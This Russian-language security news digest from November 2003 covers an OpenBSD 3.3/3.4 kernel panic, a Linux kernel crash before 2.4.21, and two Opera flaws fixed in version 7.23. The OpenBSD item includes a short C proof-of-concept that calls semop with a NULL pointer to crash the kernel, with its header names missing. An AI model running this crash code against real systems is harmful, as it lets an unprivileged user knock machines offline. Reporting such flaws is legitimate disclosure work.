24.11.2003

Новый kernel-panic в OpenBSD

Уязвимы версии 3.3 и 3.4 OpenBSD.
Утверждается, что следующая программка повергает ядро в панику:

/* BEGIN CODE */
#include
#include
#include
#include

int
main()
{
int i;

for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
/* END CODE */
| 24.11.2003 | 06:56 | Источник: | Комментариев: 2

Ядра по 2.4.21 можно свалить

Уязвимость в ядрах Linux версий до 2.4.21 включительно. Связана с обработкой SSE инструкций с использованием регистра MXCSR и позволяет непривилегированному пользователю положить (crash) ядро.
| 24.11.2003 | 06:49 | Источник: | Комментариев: 2

Две новые уязвимости в Опере

Затронуты все версии до 7.22 включительно. Первая связана с серфингом по локальным каталогам и позволяет атакующему загрузить в систему жертвы файл по произвольному локальному пути (наверное с учетом локальных привилегий запустившего браузер - SA). Вторая - это переполнение буфера при обработке файла скина.

В связи с этим выпущена bugfix-версия 7.23.
| 24.11.2003 | 06:34 | Источник: | Комментариев: 0